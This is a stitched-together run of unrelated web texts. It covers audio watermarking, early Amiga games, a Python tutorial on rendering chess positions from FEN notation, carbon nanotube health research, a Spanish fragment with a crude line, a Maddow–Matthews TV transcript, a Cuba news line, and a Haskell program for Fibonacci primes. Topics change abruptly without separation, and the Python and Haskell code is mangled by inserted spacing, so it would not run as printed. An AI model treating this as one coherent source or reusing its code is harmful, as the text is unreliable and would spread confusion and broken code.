Watermarking codes are digitally woven into the fabric of a download and do not restrict listeners from making backup copies or sharing music with friends , as does DRM coding .
Microsoft is betting on watermarking 's future , winning a patent for a " stealthy audio watermarking " scheme called El Dorado in September .
According to the patent , El Dorado is , among other things , " designed to survive all typical kinds of processing , including compression , equalization , D/ A and A/D conversion , recording on analog tape and so forth .
It is also designed to survive malicious attacks that attempt to remove or modify the watermark from the signal , including changes in time and frequency scales , pitch shifting and cut / paste editing . "
Universal and Sony declined to discuss who developed their watermarks and what they would do with the information they cull from their analyses .
Art Brodsky , of Public Knowledge , was quick to provide an answer .
" They 'll do anything they can to get ammunition , including submitting the information to Congress , publishing research and whatever , so long as they can blame everything on piracy , " Brodsky said .
EFF 's Von Lohmann speculated that watermarks could even enable ISPs to filter out peer - to - peer traffic when they detect a copyright work in transit .
It 's no secret that the Motion Picture Association of America and the Recording Industry Association of America are working with ISPs toward the goal of network - wide piracy filters .
Representatives from AT&T discussed that at the Consumer Electronics Show in Las Vegas on Tuesday .
But Von Lohmann added it 's too soon to conclude that watermarks will be put to that kind of Orwellian use .
The most powerful gaming platform
The Amiga started out its life as a dedicated games machine , and even though it grew into a full computer very quickly , it never lost its gaming side .
The machine 's 4096 - color palette , stereo sampled sound , and graphics acceleration chips made it a perfect gaming platform , and it did n't take long for game companies to start taking advantage of this power .
While the slow sales of the Amiga 1000 limited the number of games that developers were willing to make for the platform , when Commodore released the low - cost Amiga 500 in 1987 , everything changed .
Now the most powerful gaming computer was also one of the cheapest , and game companies jumped at the chance to showcase their talents on the Amiga .
Mind Walker ( 1986 )
One of the first games ever released for the Amiga was a quirky gem called Mind Walker , written by Bill Williams and published by Commodore itself .
Williams started his game design career on the Atari 800 , writing classics like Necromancer and Alley Cat .
His games were always unique , combining off - the - wall situations with innovative game play .
Mind Walker puts the gamer in the role of a physicist who has lost his mind .
Instead of resorting to drugs or therapy , the protagonist of the game decided to send his split ego into the depths of his own brain .
Your job is to navigate this surreal landscape and uncover paths leading to deeper and deeper levels , with the ultimate goal of finding the hidden key to save your sanity .
Your alter ego jumps around on brightly colored square platforms of varying height — fortunately , you can't fall off .
If you reach the end of the screen it instantly loads the adjacent area .
Floating gold balls try to zap you with deadly searchlights , but you can zap most of them with bolts of electricity that you direct with the deft skill of a Sith Lord .
Over some squares hover strange pyramids that transform your avatar from a man into a red wizard , a flying bug - like alien , or a sexy seductress .
Different forms are required to find different parts of the path , and keeping track of the whole operation requires careful consultation of the overhead map .
If the character becomes hidden behind an overly - tall platform , the player can switch to one of four different views by hitting the letters N , S , E or W .
Mindwalker by Commodore .
Once the path is complete , the game shifts to a three - dimensional view of a psychedelic tunnel .
The player has to grab a translucent green door with his disembodied hands , which leads to the final level in which the character fends off fuzzy - looking " bad thoughts " to find the next piece of his sanity .
The game has simple but evocative graphics that make good use of the Amiga 's built - in hardware polygon drawing and area fills .
Bill Williams had been a composer before he became a game designer , and the music he created for Mind Walker has an eerie , lyrical quality to it that fits perfectly with the game 's theme .
The game uses stereo pan effects to let the lightning bolts seem to sear across the room .
Like the Amiga itself , Mind Walker was unusual and thought - provoking .
Another unusual thing about the game was that it not only fit neatly on a single floppy disk , but it also had no copy protection and could be run directly from the Amiga 's Workbench GUI .
Furthermore , the game was multitasking - friendly , so you could easily run other applications in the background .
Few Amiga games in the future would retain these qualities .
Game developers , eager to squeeze out every last bit of power from the computer , would bypass the operating system and access the hardware directly .
This allowed later titles to be much more graphically impressive , but at the cost of multitasking capabilities .
Bill Williams would continue writing games up until 1992 , when corporate interference on the Super Nintendo title Bart 's Nightmare ( he referred to it as " Bill 's Nightmare " ) caused him to leave the industry altogether and pursue a second career as a Lutheran pastor , picking up a master 's degree in theology along the way .
Defender of the Crown ( 1986 )
Cinemaware was started by Robert and Phyllis Jacob in 1985 .
Their goal was to create games that had style and presentation that were evocative of movies .
This was an ambitious goal back when most video games were simple shoot - em - up or maze - chasing affairs , but the advent of the Amiga gave the small company a chance to realize their dreams .
Defender of the Crown was their first title , and it showcased the power of the new platform .
The scene : you are a Saxon baron of an English fiefdom in the Middle Ages , and the king has just been killed without a clear successor .
You must fight other Saxons and Norman invaders to conquer England and become the new king .
The game was one of the first to feature gorgeous hand - painted loading screens to set up the action , and the game itself was just as beautiful .
Each turn begins with a stylized birds - eye view of Britain .
From this menu , the player can choose to attack a neighboring county , stage a raid on an enemy castle , stage a jousting tournament , or occasionally stage a daring rescue of a beautiful maiden .
Robin
Hood pops up from time to time as a non-player character who can be either an enemy or an ally .
Defender of the Crown by Cinemaware .
As in many games of its era , winning can be frustratingly difficult .
In the raid screen , for example , you control a single fighter who must cut down enemy after enemy while his compatriots merely keep the rest of them away .
Jousting is only slightly less difficult than the real thing , requiring a steady hand on the mouse to position your lance in the right position at the right moment .
Winning a joust can gain your side honor points or even territory , depending on the initial stakes .
Defender of the Crown was an Amiga - only game at the outset , and was often used by dealers to showcase the platform to eager young gamers .
Much of the credit for the game 's success has to go to the game 's artist , Jim Sachs .
RJ Mical , who did some consulting work for the game , recalled his talent .
" Jim Sachs , what a god he is , " marveled Mical .
" Jim Sachs is amazing .
These days everyone sees graphics like that because there are a lot of really good computer graphics artists now , but back then , 20 years ago , it was astonishing to have someone that good . "
Because Cinemaware was a startup company running low on cash , and Defender was the first product , it was forced to release the game before it was completely finished .
Later , ports of the game to the Nintendo Entertainment System , Commodore 64 , IBM PC , and the Atari ST would fill out the missing parts , including a more substantial army attacking screen .
The ports could not deliver the same sound and graphics quality of the Amiga version , however .
Cinemaware continued to publish innovative games until 1991 , when over - extension and feature creep on the Cold War title SSI caused the company to declare bankruptcy .
Two early employees of the company , Lars Fuhrken - Batista and Sean Vesce , got back together to create an updated version of the game called Robin Hood : Defender of the Crown for the PlayStation 2 , Xbox , and Windows PCs in 2003 .
In a recent article Mark Dominus describes how he grew frustrated with his graphical editor and wrote a script to draw connectors :
Here ’s what I did instead .
I wrote a program that would read an input like this : >-v-< '-+-` and produce a jpeg file that looks like this :
I have n’t tried running the software , which , Dominus admits , is n’t his most polished .
What interests me is : the way he devises a mini-language for describing these connectors , then combines hand - built and standard tools to produce the required result ; and how quickly he ditches the Gimp and settles on this approach .
Clearly he ’s done this sort of thing before .
Recently I wrote about a rather easier graphics problem , of drawing chessboards .
My real mission , though , was to promote scripted graphics .
A chessboard would make a good starting point , I thought .
I planned to go on to describe a more advanced drawing problem , of putting pieces on the board — a problem requiring more pixel bashing and more thought about inputs .
This article tackles that follow - on problem .
What I did n’t realise — but really should have guessed — is that it ’s a problem which has been solved many times before in many different domains .
You can find LaTeX packages and emacs modes for it .
There ’s even a MediaWiki macro .
So if you need to draw chess positions please investigate what ’s already out there .
That said , the rest of this article follows on from its predecessor .
We ’ll settle on a suitable notation for describing chess positions and use this as a basis for creating ASCII , Unicode + CSS , and PNG graphics .
We ’ll also discuss the advantages of using an interpreted , dynamic language for image processing .
Things I learned while writing this article : Forsyth - Edwards Notation ( FEN ) is a standard way to record a chess position .
Mark Dominus invented his own input notation .
We need n’t .
The Forsyth - Edwards notation for recording a particular board position is compact , simple and standard .
From Wikipedia :
A FEN “ record ” defines a particular game position , all in one text line and using only the ASCII character set .
A FEN record contains six fields .
The separator between fields is a space .
The fields are : Piece placement ( from white ’s perspective ) .
Each rank is described , starting with rank 8 and ending with rank 1 ; within each rank , the contents of each square are described from file a through file h .
Following the Standard Algebraic Notation ( SAN ) , each piece is identified by a single letter taken from the standard English names ( pawn = “ P ” , knight = “ N ” , bishop = “ B ” , rook = “ R ” , queen = “ Q ” and king = “ K ” ) .
White pieces are designated using upper - case letters ( “ PNBRQK ” ) while Black take lowercase ( “ pnbrqk ” ) .
Blank squares are noted using digits 1 through 8 ( the number of blank squares ) , and “ / ” separate ranks . …
The remaining five fields store other pieces of state ( whose turn it is , who can castle etc. ) required for resuming a game .
We ’ll omit them from our input .
So , for example , we record the start position :
rnbqkbnr / pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR
Some moves later , the game might be at :
r2q1rk1/pp2ppbp/1np2np1/2Q3B1/3PP1b1/2N2N2/PP3PPP/3RKB1R
The first field of the FEN record is already close to an ASCII representation of a chessboard .
If we expand the digits into the spaces they represent and switch the forward slashes for newlines , then printing the resulting string gives an 8x8 text square .
( By the way , I ’ve fixed the chessboard size at 8 rather than make it an input parameter since the FEN notation wo n’t work for a board size of 10x10 or bigger . )
It ’s not hard to add some ASCII dividers to tart up this simple graphic .
def expand_blanks ( fen ) : ''' Expand the digits in an FEN string into spaces >>> expand_blanks ( " rk4q3 " ) 'rk q ' ''' def expand ( match ) : return ' ' * int( match.group(0 ) ) return re.compile ( r'\d ' ) .
sub( expand , fen ) def outer_join ( sep , ss ) : ''' Like string .
join , but encloses the result with outer separators .
Example : >>> outer_join ('| ' , [ ' 1 ' , ' 2 ' , ' 3 ' ] ) ' | 1|2|3 | ' ''' return ' % s%s%s ' % ( sep , sep.join ( ss ) , sep ) def ascii_draw_chess_position ( fen ) : ''' Returns an ASCII picture of pieces on a chessboard . ''' pieces = expand_blanks ( fen ) .replace ('/' , '') divider = '+-+-+-+-+-+-+-+-+
' rows = ( ( outer_join ( '| ' , pieces[r : r + 8 ] ) + '
' ) for r in range ( 0 , 8 * 8 , 8 ) ) return outer_join ( divider , rows )
An example :
>>> fen = " r2q1rk1 / pp2ppbp/1np2np1/2Q3B1/3PP1b1/2N2N2/PP3PPP/3RKB1R " >>> print ascii_draw_chess_position ( fen ) +-+-+-+-+-+-+-+-+ |r| | |q| |r|k| | +-+-+-+-+-+-+-+-+
|p|p| | |p|p|b|p| +-+-+-+-+-+-+-+-+ | |n|p| | |n|p| | +-+-+-+-+-+-+-+-+ | | |Q| | | | B| | +-+-+-+-+-+-+-+-+ | | | |P|P| |b| | +-+-+-+-+-+-+-+-+ | | |N| | |N| | | +-+-+-+-+-+-+-+-+
| P|P| | | |P|P|P| +-+-+-+-+-+-+-+-+ | | | |R|K|B| |R| +-+-+-+-+-+-+-+-+
Things I learned while writing this article : Unicode has code points for the black and white chess pieces .
This means we can get a rather better picture of a chess position using nothing more than text .
Note that these Unicode characters solve the internationalisation problem without the need for translators .
( We will need a suitable font though ! )
Here ’s how we can create a dictionary which maps the FEN piece ASCII names to their HTML entity codes .
unicode_pieces=dict( zip ( " KQRBNPkqrbnp " , ( " &#x %x ; " % uc for uc in range ( 0x2654 , 0x2660 ) ) ) )
I ’ve used this dictionary to create the block of text shown below .
I ’ve tried using CSS to colour and place squares on the board — sorry if it does n’t work in your browser , I ’m no CSS expert !
♜ ♛ ♜ ♚
♟ ♟ ♟ ♟ ♝ ♟
♞ ♟ ♞ ♟
♕ ♗
♙ ♙ ♝
♘ ♘
♙ ♙ ♙ ♙ ♙
♖ ♔ ♗ ♖
This image is n’t ideal : the board background is visible through the pieces , which is particularly noticeable for white pieces on dark squares .
I have n’t figured out how to eliminate this flaw !
Things I learned while writing this article : MediaWiki has a fully - featured macro for chess diagrams .
Here ’s the opening chess position as a MediaWiki macro .
If this seems like too much effort to type , David A . Wheeler provides an online FEN - to - Wikipedia conversion tool .
{{Chess diagram|= | tright | |= 8 |rd|nd|bd|qd|kd|bd|nd|rd|= 7 |pd|pd|pd|pd|pd|pd|pd|pd|= 6 | | | | | | | | |= 5 | | | | | | | | |= 4 | | | | | | | | |= 3 | | | | | | | | |= 2 |pl|pl|pl|pl|pl|pl|pl|pl|= 1 |rl|nl|bl|ql|kl|bl|nl|rl|= a b c d e f g h | }}
Things I learned while writing this article : OS X has problems distinguishing upper - and lower - case filenames .
The OS X filename limitation came as a nasty surprise .
Most of the time I use my Mac like any other Unix box and so I naturally expected that K.png and k.png would co-reside happily in the same directory .
They can ’t !
Apparently it ’s for backwards compatibility , to keep old software alive .
Yuck !
Anyway , to render a chess position using the Python Imaging Library ( PIL ) , we ’ll need some suitable pictures of the pieces .
I downloaded some from Wikipedia ( thanks ! )
It ’s important these images have an alpha channel .
( The alpha channel assigns an opacity to each pixel , which will be used when we compose the image with another : when we put the piece on the board , that is .
Without an alpha channel , we would n’t see the squares underneath the pieces . )
An interpreted language comes into its own when working with an image .
Here ’s a session in which we open a PNG ( the black king ) and poke around at it to find :
what it looks like
its mode and size
whether all pixels are grey
how many transparent and opaque pixels it has
the contents of a few pixels on the left of the image
>>> import Image >>> king = Image.open (' k.png ' ) >>> king.show ( ) >>> king.mode ' RGBA ' >>> king.size ( 45 , 45 ) >>> pixels = king.load ( ) >>> def is_grey ( rgba ) : ... r , g , b , a = rgba ... return r == g == b ... >>>
W , H = king .size >>> xys = [ ( x , y ) for y in range ( H ) for x in range ( W ) ] >>> all ( is_grey ( pixels [xy ] ) for xy in xys ) True >>> sum ( 1 for xy in xys if pixels [ xy ] [ 3 ] == 0 ) 1243 >>> sum ( 1 for xy in xys if pixels [ xy ] [ 3 ] == 255 ) 612 >>> print "
" . join ( map ( repr , ( pixels[x , 20 ] for x in range ( 10 ) ) ) ) ( 0 , 0 , 0 , 0 ) ( 0 , 0 , 0 , 0 ) ( 0 , 0 , 0 , 0 ) ( 0 , 0 , 0 , 0 ) ( 0 , 0 , 0 , 0 ) ( 15 , 15 , 15 , 170 ) ( 247 , 247 , 247 , 255 ) ( 148 , 148 , 148 , 255 ) ( 0 , 0 , 0 , 255 ) ( 0 , 0 , 0 , 255 )
To place this piece on top of a background image we use Image .
paste .
Again , we can experiment interactively .
>>> red_sq = Image.new ( ' RGBA ' , king .size , ' red ' ) >>> help(red_sq.paste )
Help on method paste in module Image : paste ( self , im , box=None , mask =None ) method of Image .
Image instance Paste other image into region >>> mask = king.split ( ) [ 3 ] >>> red_sq.paste(king , None , mask ) >>> red_sq.show ( )
Note that Image .
show allows us to view the image using some platform dependent utility .
Once we ’ve figured out how to put pieces on the board using Image .
paste , the rest is all details .
I ’ve decided to create a class for rendering chess positions .
Creating a class instance pre-loads the piece graphics and sketches in the board background ; each time we call draw , the background is copied and the pieces are pasted into place .
The resulting image is returned directly to the client , who can choose what to do with it .
#! /usr/bin/env python ''' Code to draw chess board and pieces .
FEN notation to describe the arrangement of peices on a chess board .
White pieces are coded : K , Q , B , N , R , P , for king , queen , bishop , rook knight , pawn .
Black pieces use lowercase k , q , b , n , r , p .
Blank squares are noted with digits , and the " / " separates ranks .
As an example , the game starts at : rnbqkbnr / pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR
See : http://en.wikipedia.org/wiki/Forsyth-Edwards_Notation ''' import re import Image import ImageDraw class BadChessboard ( ValueError ) : pass def expand_blanks ( fen ) : ''' Expand the digits in an FEN string into spaces >>> expand_blanks ( " rk4q3 " ) 'rk q ' ''' def expand ( match ) : return ' ' * int( match.group(0 ) ) return re.compile ( r'\d ' ) . sub( expand , fen ) def check_valid ( expanded_fen ) : ''' Asserts an expanded FEN string is valid ' '' match = re.compile ( r'( [ KQBNRPkqbnrp ] { 8} / ) {8 } $ ' ) . match if not match ( expanded_fen + '/' ) : raise BadChessboard ( ) def expand_fen ( fen ) : ''' Preprocesses a fen string into an internal format .
Each square on the chessboard is represented by a single character in the output string .
The rank separator characters are removed .
Invalid inputs raise a BadChessboard error . ''' expanded = expand_blanks ( fen ) check_valid ( expanded ) return expanded .replace ('/' , '') def draw_board ( n=8 , sq_size= ( 20 , 20 ) ) : ''' Return an image of a chessboard .
The board has n x n squares each of the supplied size .''' from itertools import cycle def square( i , j ) : return i * sq_size [ 0 ] , j * sq_size [ 1 ] opaque_grey_background = 192 , 255 board = Image.new ( ' LA ' , square ( n , n ) , opaque_grey_background ) draw_square = ImageDraw .
Draw ( board ) . rectangle whites = ( ( square ( i , j ) , square ( i + 1 , j + 1 ) ) for i_start , j in zip ( cycle ( ( 0 , 1 ) ) , range ( n ) ) for i in range ( i_start , n , 2 ) ) for white_square in whites : draw_square ( white_square , fill=' white ' ) return board class DrawChessPosition ( object ) : ''' Chess position renderer .
Create an instance of this class , then call ''' def __init__ ( self ) : ''' Initialise , preloading pieces and creating a blank board .''' self .n = 8 self.create_pieces ( ) self.create_blank_board ( ) def create_pieces ( self ) : ''' Load the chess pieces from disk .
Also extracts and caches the alpha masks for these pieces . ''' whites = ' KQBNRP ' piece_images = dict ( zip ( whites , ( Image.open ( ' pieces/w%s.png ' % p ) for p in whites ) ) ) blacks = ' kqbnrp ' piece_images.update ( dict ( zip ( blacks , ( Image.open ( ' pieces / %s.png ' % p ) for p in blacks ) ) ) ) piece_sizes = set ( piece.size for piece in piece_images.values ( ) )
# Sanity check : the pieces should all be the same size assert len( piece_sizes ) == 1 self.piece_w , self.piece_h = piece_sizes.pop ( ) self.piece_images = piece_images self.piece_masks = dict ( ( pc , img.split( ) [ 3 ] ) for pc , img in self.piece_images.iteritems ( ) ) def create_blank_board ( self ) : ''' Pre-render a blank board . ''' self .board = draw_board( sq_size=(self.piece_w , self.piece_h ) ) def point ( self , i , j ) : ''' Return the top left of the square at ( i , j ) . ''' w , h = self .
piece_w , self .
piece_h return i * h , j * w def square ( self , i , j ) : ''' Return the square at ( i , j ) . ''' t , l = self .
point ( i , j ) b , r = self .
point( i + 1 , j + 1 ) return t , l , b , r def draw ( self , fen ) : ''' Return an image depicting the input position .
fen - the first record of a FEN chess position .
Clients are responsible for resizing this image and saving it , if required . ''' board = self.board.copy ( ) pieces = expand_fen ( fen ) images , masks , n = self .
piece_images , self .
piece_masks , self .n pts = ( self. point ( i , j ) for j in range ( n ) for i in range ( n ) ) def not_blank ( pt_pc ) : return pt_pc [ 1 ] != ' ' for pt , piece in filter ( not_blank , zip ( pts , pieces ) ) : board.paste( images [ piece ] , pt , masks [ piece ] ) return board
This code depends on PNGs for the pieces being available in the current directory , filed under the ( case - sensitive ! ) names : {K , Q , B, N , R , P , k , q , b,n , r, p}.png .
It also requires all these PNGs to have the same dimensions .
Here ’s how to use it :
>>> renderer = DrawChessPosition ( ) >>> fen = " r2q1rk1 / pp2ppbp/1np2np1/2Q3B1/3PP1b1/2N2N2/PP3PPP/3RKB1R " >>> board = renderer.draw ( fen ) >>> board.show ( ) >>> board.save ( " %s.png " % fen.replace ( '/ ' , '-' ) )
And here ’s the resulting image ( with a CSS double border ) :
There is a problem with the approach taken in the previous section .
We only get a good graphic if we save the returned image at its native size : scaling it up or down results in a suboptimal picture .
That ’s because the scaling does n’t have enough information to go on — it has to work from a pixel raster when it really needs strokes or vector graphics .
So if we scale the linear dimensions up or down :
>>> fen = " r2q1rk1 / pp2ppbp/1np2np1/2Q3B1/3PP1b1/2N2N2/PP3PPP/3RKB1R " >>> renderer = DrawChessPosition ( ) >>> board = renderer.draw ( fen ) >>> board.size ( 360 , 360 ) >>> small_board = board.resize( ( 160 , 160 ) ) >>> big_board = board.resize ( ( 640 , 640 ) ) >>> big_4_squares = big_board.crop ([ 80 , 160 , 240 , 320 ] ) >>> big_4_squares.show ( ) >>> small_board.show ( )
we ’ll get something like this :
The way to avoid the aliasing problems is to work directly from a stroke representation of the chess pieces ; for example , by using a suitable font .
Once again , PIL can do the job ( though you ’ll need to have installed PIL with FreeType support ) .
I found a freely available unicode true type font and plugged it into the following code :
unichr_pieces=dict( zip ( " KQRBNPkqrbnp " , ( unichr ( uc ) for uc in range ( 0x2654 , 0x2660 ) ) ) ) def chess_position_using_font ( fen , font_file , sq_size ) : ''' Return a chess position image .
font_file - the name of a font file sq_size - the size of each square on the chess board ''' font = ImageFont.truetype( font_file , sq_size ) pieces = expand_fen ( fen ) board = draw_board ( sq_size= ( sq_size , sq_size ) ) put_piece = ImageDraw .
Draw ( board ) . text def point( i , j ) : return i * sq_size , j * sq_size def not_blank ( pt_pce ) : return pt_pce [ 1 ] != ' ' pts = ( point ( i , j ) for j in range ( 8 ) for i in range ( 8 ) ) for pt , piece in filter ( not_blank , zip ( pts , pieces ) ) : put_piece ( pt , unichr_pieces [ piece ] , fill = ' black ' , font=font ) return board
If we use this code to create small and large chess pictures , much as before , we ’ll see something like this :
As with our CSS +
Unicode picture , this image is n’t ideal since the board shows through the interiors of the pieces .
And once again , I have n’t figured out how to work around this problem .
Update , 2008 - 03 -31 .
A reader has worked out a cunning solution :
You can make white pieces by drawing a “ black ” piece in white , then overlaying that with a “ white ” piece in black .
I ’ve given this idea a try and written up the results .
Here ’s the knight at square c3 — a definite improvement !
Things I learned while writing this article : the skak package does chess with LaTeX .
My thanks Ivan Uemlianin for pointing out that I ’d neglected to mention LaTeX as a suitable chess position type - setter , as shown in his blog .
LaTeX has been high on my list of things I really ought to learn about for well over a decade , and I simply was n’t aware it could do this .
This article has shown , again , the merits of scripting graphics .
We ’ve also seen that an interpreted language has much to offer in this area , allowing us to query and shape images dynamically , effectively bridging the gap between our program and a GUI driven graphics package .
The Python Imaging Library has shown itself capable of working with shapes , colours , text and fonts .
It ’s a great tool .
We ’ve not done so well at our motivating task , of drawing a chess position .
As I said at the outset , if that ’s why you ’re here I ’d suggest taking another look at the alternatives .
The subtext of this article is platform - dependence .
I do n’t know if the Unicode + CSS combination works in your browser or feed - reader , or indeed any other user agent ; it depends on font contents and CSS rendering .
The “ P ” in PNG stands for “ Portable ” , and I would hope you can see the IMGs , which all source from PNGs — all except the off - site JPEG , another well supported format .
One reason I like Python and writing about Python is its platform independence .
Linux , Windows , OS X etc. — we can all run the same code .
For this particular application , that ’s less true .
For a start , you ’ll need to install the non-standard PIL module .
Then there ’s the filename case - insensitivity ( which is easy to work around , but nonetheless an embarrassment ) .
The capabilities of PIL itself depend on the presence of other thirdparty libraries : to get you going with this article you ’ll need libpng , which in turn depends on zlib , and FreeType , which again depends on zlib .
On my Linux machine Image .
show did n’t work until I ’d installed xv from source , and that source needed some tweaking before it would build .
So the code in this article is only portable once you ’ve suitably prepared your platform — that is , the code is n’t really portable !
Carbon nanotubes may be as harmful as asbestos Study finds they may be as deadly to workers as asbestos
Image showing the handling of carbon nanotubes .
Image provided by Dave Rejeski / Project on Emerging Nanotechnologies Ran on : 11-24-2006
Berkeley wants to ensure the safety of nanotechnology , like these carbon nanotubes , at the university and at Lawrence Berkeley lab .
ALSO Ran on : 03-16-2007 Lawrence Berkeley Laboratory earned almost all As on its Energy Department report card .
Ran on : 03-16-2007 Stanford Linear Accelerator
Center got the lowest marks overall and earned just one A grade .
Ran on : 03-16-2007 less Image showing the handling of carbon nanotubes .
Image provided by Dave Rejeski / Project on Emerging Nanotechnologies Ran on : 11-24-2006
Berkeley wants to ensure the safety of nanotechnology , like these carbon ... more Photo : Project On Emerging Nanotechnolo Photo : Project On Emerging Nanotechnolo Image 1 of / 3 Caption Close Carbon nanotubes may be as harmful as asbestos 1 / 3 Back to Gallery
One of the most promising materials for the future of technology , carbon nanotubes , might be as harmful as asbestos if inhaled , according to a new study published Tuesday in the scientific journal Nature Nanotechnology .
Animal studies indicate that these long and very thin carbon molecules could cause a cancer called mesothelioma , which occurs in the lining of the lungs .
" The problem of asbestos was caused when it was released into the air , if it was handled inappropriately or incorrectly .
Carbon nanotubes could do the same , " said Andrew Maynard , chief science adviser to the Project on Emerging Nanotechnologies in Washington and one of the authors of the study .
" With this information , we should assume the worst , we should think of them as asbestos .
But more research might relax that point of view . "
Carbon nanotubes , 10,000 times thinner than a human hair , are among the materials many scientists believe will be used to build tiny electronics .
MBA BY THE BAY : See how an MBA could change your life with SFGATE 's interactive directory of Bay Area programs .
In 2001 , IBM made an array of transistors out of carbon nanotubes .
In 2004 , General Electric created a carbon nanotube diode , and last year , UC Berkeley scientists used single carbon nanotubes to make the world 's smallest radio .
Today , the most widespread application is in plastic materials reinforced by carbon nanotubes .
Stronger than steel but light as plastic , carbon nanotubes are highly attractive to manufacturers of everything from sporting goods to airplanes .
They can be found , for example , in some tennis rackets , baseball bats and bicycle frames .
" I would be very surprised if it is dangerous to use , let us say , a tennis racket or baseball bat containing carbon nanotubes , " Maynard said .
" But I do not think it is OK to tell people that we think it is safe - we 've got to have evidence . "
Such products , he said , should go through a number of tests investigating , for instance , what happens when they break or when the surface is rubbed against the ground .
He also wonders what happens when the products are disposed of .
" Is there a chance that the nanotubes will enter the environment ? " Maynard said .
The main concern , however , is the effect on people processing carbon nanotubes and manufacturing the materials containing them .
At Unidym , a Menlo Park company exploring the possibilities of using carbon nanotubes in such items as touch screens , precautions already have been taken .
" This is what we expected .
It fits with the paradigm that long and skinny fibers can cause asbestosis .
It does not really matter if they are made of carbon or asbestos .
The key is not getting them into the body , " said Ken McElrath , vice president for product development materials at Unidym 's facility in Houston , which manufactures the carbon nanotubes .
To protect employees from breathing nanotubes , the manufacturing is conducted in closed ventilated systems .
People working with the nanotubes also are protected by dust masks with respiratory filters .
McElrath said he found the study to contain some positive news : Shorter carbon nanotubes might not be harmful .
" We are using these kinds of findings in our product design , " he said .
" We try to stay away from things that potentially cause problems . "
The research presented in Nature Nanotechnology used an animal model developed in the 1980s to study the development of mesothelioma , which can be caused by asbestos exposure .
Using this model , the nanotubes were injected into the abdominal cavity of mice , which is lined by tissue similar to the human lung and is a sensitive predictor of mesothelioma .
After one week , there was an inflammatory response to longer versions of the nanotubes .
" This is a very important study ; it is very well done .
It shows that you do get an inflammation that is similar to asbestosis .
What is not known yet is the long - term effect , " said Vincent Castranova , involved in the nanotoxicology research at the National Institute for Occupational Safety and Health .
Also unclear is how this experimental model for mesothelioma translates into reality .
Scientists do not know under which circumstances these long carbon nanotubes will form a breathable dust , or whether this dust will work its way into the lung .
" Here we run out of information , " Maynard said .
Meanwhile , Castranova recommends people working with carbon nanotubes follow National Institute for Occupational Safety and Health guidelines for working with engineered nanomaterials , which involve the use of respirators and special filters to clean the air .
Imagenes de hombre solo triste morbosa me escito con facilidaz
Este es mi testimonio y juro dejar escrito solamente la verdad como verdadero es Dios , por la memoria de mi abuelita Zoilamérica Zambrano Sandino , a quien tantas veces he invocado en momentos de desesperación y angustia ; por mi hijo Alejandro y mi hija Carolina , quienes representan la luz y esperanza de una nueva vida .
Download Download ( h/t Heather )
On Friday 's Countdown , guest host Rachel Maddow asked Chris Matthews about his refusal to allow talk show host Kevin James to blindly repeat White House talking points without having any idea what those buzzwords meant .
We 're quick to call out Matthews when he does something wrong , I think it 's incumbent upon us to let him know when he 's done well too .
And to his credit , Matthews understands how fundamentally detrimental these buzzwords are to a functioning democracy ( and before you retort , no one is harder on him than I am , and he rarely allows them unchallenged on his program - - he's far more likely to be swayed by the perceived power -- or attractiveness -- of the person than the words they speak ) .
MADDOW : Do you think this is something new ?
Do you think this is something specific to our current , contemporaneous politics that we have these sort of buzzwords and bumper sticker slogans , whether it ’s ‘ appeasement , ’ or ‘ fight over there so we do n’t fight them here ’ or ‘ they hate our freedom , ’ any of these terms .
Are they designed to be repeated and not to be interrogated ?
MATTHEWS : Well , just look at the way people are basically exterminated or tried to be exterminated .
Bill Maher makes a comment -- which may not have been the right comment -- but he was making a point he was trying to make , about stand back weaponry compared to people killing themselves .
You can argue about the niceties of that .
The Dixie Chicks say something about the war — and they should n’t have said it overseas , but they said it .
The shutting up of opposition is critical to running a country in an undemocratic way , let ’s put it that way .
And so you have buzzwords like ‘ appeasers ’ or ‘ cut and run ’ and they ’re used over and over again by the most mindless people .
The trouble with them is they tend to work .
The dittoheads can use them .
Anyone can use them and they seem to have the same effect .
They cause people to run from criticism .
On a related note : Media Bloodhound writes that the day after the ' appeasement ' remarks , the ghost of Prescott Bush was seen hovering over the White House .
Maybe because he grasps history so much better than its current occupant and his minions .
Cuban foreign minister Bruno Rodriguez Parrilla rejected Monday on Twitter the statements of Mike Pompeo , the U.S. secretary of state , on the imposition of new measures against Cuba .
From HaskellWiki
The problem is to find all primes in the sequence of rapidly growing Fibonacci numbers .
Miller - Rabin probabilistic primality test is used to check numbers in the sequence .
In addition only the elements with prime indices in the sequence are considered due to known properties of Fibonacci numbers .
The parallel capabilities of GHC give almost twofold performance speedup if running the program on a dual core system .
module Main where import Data .
Time .
Clock .
POSIX import Data .
Maybe import Numeric import Char import Control .
Parallel .
Strategies -- binary representation of an integer binary :: Integer ->
String binary = flip ( showIntAtBase 2 intToDigit ) [ ] -- returns
True if ( a ) is a witness that odd n is compound witness :: Integer -> Integer ->
Bool witness n a = pow ( tail $ binary $ n - 1 ) a where pow _ 1 = False pow [ ] _ =
True pow xs d = pow ' xs d $ ( d * d ) ` mod ` n where pow ' _ d d2 | d2 == 1 && d /= ( n - 1 ) =
True pow ' ( ' 0 ' : xs ) d d2 = pow xs d2 pow ' ( ' 1 ' : xs ) d d2 = pow xs $ ( d2 * a ) ` mod ` n -- is ( n ) a prime with probability 4 ^ ( - k ) miller_rabin k n | even n = n == 2 | otherwise = not $ any ( witness n ) $ takeWhile ( < n ) $ take k primes primes :: [ Integer ] primes = 2 : 3 : 5 : [ x | x <- candidates 7 11 , is Prime x ] where candidates a 1 a 2 = a 1 : a2 : candidates ( a 1 + 6 ) ( a 2 + 6 ) -- simple primality test applied for indices only , not for Fibonacci numbers is Prime x = all (( 0 /= ) . ( x ` mod ` ) ) $ takeWhile (( x >= ) . ( ^ 2 ) ) primes fib = 1 : 1 : [ a + b | ( a , b ) <- zip fib ( tail fib ) ] -- indexed Fibonacci numbers numfib = zip [ 1 .. ] fib is PrimeOr4 x = x /= 1 && x /= 2 && ( x == 4 || is Prime x ) --
Fibonacci numbers with primal indices numfib ' = filter ( is PrimeOr4 .
fst ) numfib isProbably Prime = miller_rabin 10 maybeFibprimes = [ if is Probably Prime f then Just ( n , f ) else Nothing | ( n , f ) <- numfib ' ] -- probably you need to increase 10 if running the program -- in more than two threads fibprimes = catMaybes $ parBuffer 10 rnf maybeFibprimes main = do start <- getPOSIXTime printEach fibprimes start 1 where printEach ( x : xs ) start n = do t <- getPOSIXTime print ( t - start , n , fst x ) printEach xs start ( n + 1 )
In order to gain parallel benefits compile the program using
ghc -- make –threaded parfibs.hs
then run by
parfibs + RTS - N2
